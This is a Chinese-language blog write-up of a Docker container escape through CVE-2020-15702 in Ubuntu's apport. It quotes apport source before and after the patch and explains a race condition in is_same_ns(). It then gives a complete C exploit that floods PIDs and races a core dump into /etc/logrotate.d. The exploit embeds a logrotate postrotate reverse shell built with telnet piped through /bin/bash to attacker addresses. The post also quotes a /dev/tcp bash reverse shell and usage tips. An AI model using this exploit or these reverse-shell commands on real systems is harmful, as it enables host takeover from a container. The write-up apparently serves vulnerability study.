点击蓝字
关注我们
首先看看漏洞描述
the is_same_ns() function fails open (returning True) 的处理,也就是说,之前未修复漏洞时,在is_same_as()函数open失败时是不会引发将local pid更换为global pid的操作的,也就是说,我们可以通过特殊方法使其不走以上任何一个分支,继续往下走。def is_same_ns(pid, ns):if not os.path.exists('/proc/self/ns/%s' % ns) or \not os.path.exists('/proc/%s/ns/%s' % (pid, ns)):# If the namespace doesn't exist, then it's obviously sharedreturn Truetry:if os.readlink('/proc/%s/ns/%s' % (pid, ns)) == os.readlink('/proc/self/ns/%s' % ns):# Check that the inode for both namespaces is the samereturn Trueexcept OSError as e:if e.errno == errno.ENOENT:return Trueelse:raisereturn False
未修复的源码
# Check if we received a valid global PID (kernel >= 3.12). If we do,# then compare it with the local PID. If they don't match, it's an# indication that the crash originated from another PID namespace.# Simply log an entry in the host error log and exit 0.if len(sys.argv) == 6:host_pid = int(sys.argv[5])if not is_same_ns(host_pid, "pid") and not is_same_ns(host_pid, "mnt"):# If the crash came from a container, don't attempt to handle# locally as that would just result in wrong system information.# Instead, attempt to find apport inside the container and# forward the process information there.if not os.path.exists('/proc/%d/root/run/apport.socket' % host_pid):error_log('host pid %s crashed in a container without apport support' %sys.argv[5])sys.exit(0)[ ... ]sys.exit(0)elif not is_same_ns(host_pid, "pid") and is_same_ns(host_pid, "mnt"): #这里# If it doesn't look like the crash originated from within a# full container, then take the global pid and replace the local# pid with it, then move on to normal handling.# This bit is needed because some software like the chrome# sandbox will use container namespaces as a security measure but are# still otherwise host processes. When that's the case, we need to keep# handling those crashes locally using the global pid.sys.argv[1] = str(host_pid)elif not is_same_ns(host_pid, "mnt"):error_log('host pid %s crashed in a separate mount namespace, ignoring' % host_pid)sys.exit(0)
修复之后的源码
elif not is_same_ns(host_pid, "mnt"):error_log('host pid %s crashed in a separate mount namespace, ignoring' % host_pid)sys.exit(0)else:# If it doesn't look like the crash originated from within a# full container or if the is_same_ns() function fails open (returning# True), then take the global pid and replace the local pid with it,# then move on to normal handling.# This bit is needed because some software like the chrome# sandbox will use container namespaces as a security measure but are# still otherwise host processes. When that's the case, we need to keep# handling those crashes locally using the global pid.sys.argv[1] = str(host_pid)
根据cve信息的提示,我们追踪源码
可以看到更改过的pid会进入get_pid_info中,贴上源码
def get_pid_info(pid):'''Read /proc information about pid'''global pidstat, real_uid, real_gid, cwd# unhandled exceptions on missing or invalidly formatted files are okay# here -- we want to know in the log filepidstat = os.stat('/proc/%s/stat' % pid)# determine real UID of the target process; do *not* use the owner of# /proc/pid/stat, as that will be root for setuid or unreadable programs!# (this matters when suid_dumpable is enabled)with open('/proc/%s/status' % pid) as f:for line in f:if line.startswith('Uid:'):real_uid = int(line.split()[1])elif line.startswith('Gid:'):real_gid = int(line.split()[1])breakassert real_uid is not None, 'failed to parse Uid'assert real_gid is not None, 'failed to parse Gid'cwd = os.readlink('/proc/' + pid + '/cwd')
声明一些全局变量然后给cwd赋值,os.readlink()是返回软连接路径,往后看可以知道这是用来生成core文件的路径,之后我们直接看生成core的部分
我选择信号SIGQUIT是因为这里比较靠前,而且基本不涉及什么检测
def write_user_coredump(pid, cwd, limit, from_report=None):'''Write the core into the current directory if ulimit requests it.'''# three cases:# limit == 0: do not write anything# limit < 0: unlimited, write out everything# limit nonzero: crashed process' core size ulimit in bytesif limit == 0:return# don't write a core dump for suid/sgid/unreadable or otherwise# protected executables, in accordance with core(5)# (suid_dumpable==2 and core_pattern restrictions); when this happens,# /proc/pid/stat is owned by root (or the user suid'ed to), but we already# changed to the crashed process' real uidassert pidstat, 'pidstat not initialized'if pidstat.st_uid != os.getuid() or pidstat.st_gid != os.getgid():error_log('disabling core dump for suid/sgid/unreadable executable')returncore_path = os.path.join(cwd, 'core')try:with open('/proc/sys/kernel/core_uses_pid') as f:if f.read().strip() != '0':core_path += '.' + str(pid)core_file = os.open(core_path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)except (OSError, IOError):returnerror_log('writing core dump to %s (limit: %s)' % (core_path, str(limit)))written = 0# Priming readif from_report:r = apport.Report()r.load(from_report)core_size = len(r['CoreDump'])if limit > 0 and core_size > limit:error_log('aborting core dump writing, size %i exceeds current limit' % core_size)os.close(core_file)os.unlink(core_path)returnerror_log('writing core dump %s of size %i' % (core_path, core_size))os.write(core_file, r['CoreDump'])else:# read from stdinblock = os.read(0, 1048576)while True:size = len(block)if size == 0:breakwritten += sizeif limit > 0 and written > limit:error_log('aborting core dump writing, size exceeds current limit %i' % limit)os.close(core_file)os.unlink(core_path)returnif os.write(core_file, block) != size:error_log('aborting core dump writing, could not write')os.close(core_file)os.unlink(core_path)returnblock = os.read(0, 1048576)os.close(core_file)return core_path
/proc/sys/kernel/core_pattern在你们的机子上看到的可能和我的不太一样,我的是改过的,这是为了适配当前环境,等配环境时会说,这个文件主要是决定生成的core命名方式如何,以及从内核的coredump.c传过来的参数有哪些。
/proc/sys/kernel/core_uses_pid
同样的这个应该也不同,为1代表生成的core文件带.pid,为0就不带,有同样功能的还有core_pattern里的参数,不过这里的优先级更高
/proc/sys/kernel/pid_max
def init_error_log():'''Open a suitable error log if sys.stderr is not a tty.'''if not os.isatty(2):log = os.environ.get('APPORT_LOG_FILE', '/var/log/apport.log')try:f = os.open(log, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)try:admgid = grp.getgrnam('adm')[2]os.chown(log, -1, admgid)os.chmod(log, 0o640)except KeyError:pass # if group adm doesn't exist, just leave it as rootexcept OSError: # on a permission error, don't touch stderrreturnos.dup2(f, 1)os.dup2(f, 2)sys.stderr = os.fdopen(2, 'wb')if sys.version_info.major >= 3:sys.stderr = io.TextIOWrapper(sys.stderr)sys.stdout = sys.stderrdef error_log(msg):'''Output something to the error log.'''apport.error('apport (pid %s) %s: %s', os.getpid(), time.asctime(), msg)
error_log(str) 输入,由于apport中日志初始化不是在第一行,所以我稍微改了一下,开头初始化,然后再运行就发现报错地方在这里%E,删去之后就成了之前显示的|/usr/share/apport/apport %p %s %c %d %Pget_pid_info 中会访问对应pid的一些文件,而如果在物理机中没有这个pid的话,那么对应的文件也就不存在,会报错,我们需要让物理机上存在这么一个pid的进程,这样才能生成core,而且这个core还是在物理机中这个pid的进程所在的文件夹。cwd = os.readlink('/proc/' + pid + '/cwd')拿这句话来说可以看到对应的就是运行程序对应的路径
所以我们docker里的一个进程pid假如是6552,那么其逃逸到物理机上时对应的进程就会是图上的进程,生成core的路径也会是这个进程的路径,那么现在的问题有两个
怎么使得程序绕过apport中那两个判断,从而两个分支一个都不走呢
怎么使得docker里的pid出来后正好有个物理机的pid对应上呢
解决第一个问题
第一个问题我们可以利用条件竞争,先看源码
我们如果让第一个返回True,以及下个elif也返回True,就可绕过,返回True的情况有
def is_same_ns(pid, ns):if not os.path.exists('/proc/self/ns/%s' % ns) or \not os.path.exists('/proc/%s/ns/%s' % (pid, ns)):# If the namespace doesn't exist, then it's obviously sharedreturn True #=======================这里try:if os.readlink('/proc/%s/ns/%s' % (pid, ns)) == os.readlink('/proc/self/ns/%s' % ns):# Check that the inode for both namespaces is the samereturn True #=====================这里except OSError as e:if e.errno == errno.ENOENT:return True #======================这里else:raisereturn False
我们要利用的情况是第一种,如何让第一个return返回true呢,我们只要在apport运行到这里之前,把对应的pid kill掉就可以
int pid = fork();if (pid) {/* kill the child process, after it stimulate the core dump */usleep(2000);kill(pid, SIGKILL);}else {/* must stimulate the raise before kill */raise(SIGQUIT); //to make core}
解决第二个问题
我们可以通过大量的fork来制造进程,并waite,来占位,占pid。另外这里有一点需要强调,在docker里面每个进程都有一个物理机中对应的pid,也就是说其有两个pid,那么物理机中的那个pid对应的路径其实和docker里的那个路径一样,所以我们可以通过控制docker内进程的路径来控制core的生成路径。
通过以上步骤我们很简单就可以使得一个docker里的崩溃进程生成的core出现在物理机中。
在生成core之前我们还要检查一下配置
先输入ulimit -c检查对core文件生成的大小的限制,有可能是0,在限制大小为0时不会生成core,我们需要设置 ulimit -c unlimited
source /etc/security/limits.conf,其实按网上说法,只要改limits.conf中的配置就能永久生效,不用每次开机都改,但是我实操下来还是要每次开机配置一遍core会生成在docker中,这点让我觉得很莫名其妙。因为抛开docker中崩溃的程序不会生成core不谈,apport是运行在docker之外的,其生成的core的路径也应该是在docker之外的路径才对,虽然路径看起来一样,但是生成在docker中而物理机中没有就很让我费解。就比如docker内和外都有的路径/etc/logrotate.d/,有时apport生成的core指明路径在/etc/logrotate.d/下,但是发现却是在docker内的这一路径下,还好只是有时。逃逸第二步
我们已经可以使得core逃逸出来了,但是单逃逸出来有什么用呢?我们需要让其执行,而且单执行也没用,其中多是一些程序崩溃前的信息,被保存下来,除非我们可以控制往core中输入的内容,否则直接运行也得不到什么。
其实前辈们早就总结出了一系列针对这一状况的应对措施,那就是linux的crontab,专用于执行定时任务,而其中有个ubuntu的默认定时任务logrotate ,讲解这个的利用可以看这里
看到定时任务,就可以想到触发运行是没问题了,但是运行什么呢?
`core保存的是程序崩溃前的信息,同样的,字符串也会被保存下来
logrotate在上面的链接里会讲,他有一些规则文件的运行机制是会忽略文件内的非法字符,只运行其中合法字符
所以我们可以在崩溃程序里把想运行的指令写成字符串形式,然后生成的core中首先会有大量乱码,但是字符串变量会保存的比较完好,我们应当声明其为全局变量,这样他会在data段保存的比较完整,而若是声明为局部变量,保存在栈上中间会夹杂一些乱码,干扰运行。
光是上面说的还不够,我们需要看一下对应的logrotate运行的格式,也就是命令怎么写
shell的部分,另外有一点要说明,开头部分的/var/log/cups/*log 是对应文件,也就是这个命令是对这些文件的操作,如果对应文件不存在,命令就不会运行,说到这里logrotate本身的作用其实就是定期清理日志文件,对其进行压缩或别的操作,具体看man logrotate#include <stdio.h>#include <signal.h>#include <stdlib.h>#include <unistd.h>#include <sys/wait.h>/*/var/log/cups/*log {dailymissingokrotate7sharedscriptspostrotatetelnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321endscript}*/char payload[] = "\n/var/log/cups/*log {\n daily\n missingok\n rotate7\n sharedscripts\n postrotate\n telnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321\n endscript\n}\n";void fork_bomb(int num){int i;for(i = 0; i < num; i++){int pid = fork();if (pid){wait(NULL);}}}int main(int argc, char const *argv[]){chdir("/etc/logrotate.d");int i;for(i = 0; i < 5; i++){fork_bomb(200);int pid = fork();if (pid) {/* kill the child process, after it stimulate the core dump */usleep(2000);kill(pid, SIGKILL);}else {/* must stimulate the raise before kill */raise(SIGQUIT); //to make core}usleep(1000*100);puts("wait... maybe the core has already been generated :)");}return 0;}
telnet 172.17.0.2 1234 | /bin/bash | telnet 192.168.56.246 4321是反向shell,具体的参数含义看这里在docker中运行exp可以过段时间自己中断,生成core的时机完全看运气,运气好刚运行一会就在物理机对应目录下生成了,运气坏可能要很久,有些core是空的,这是因为kill的太早,我用的两秒不是最佳时间,各位可以自己多次实验找最好时间。
生成core后因为这玩意定时触发,我们等定时那个时间太久了就,所以我们手动触发一下
logrotate -f [filename]
然后别忘了在自己机器上监听对应端口,因为我用的反向shell命令的原因,所以需要俩终端监听,一个是输命令,一个返回命令运行结果,这点在上面链接有讲。之所以搞那么麻烦是因为刚开始用的
bash -i >& /dev/tcp/攻击主机ip/port 0>&1 会报错,所以就找别的将就一下。
参考:
《卢宇—Docker逃逸:从一个进程崩溃讲起》(滴滴安全大会ppt)
几种常见反弹shell汇总 :(https://blog.csdn.net/qiuyeyijian/article/details/102993592)
A technical description of CVE-2020-15702 - Flatt Security Blog (hatenablog.com)
https://wiki.ubuntu.com/Apport
企业资讯
安全干货
Gartner 专 栏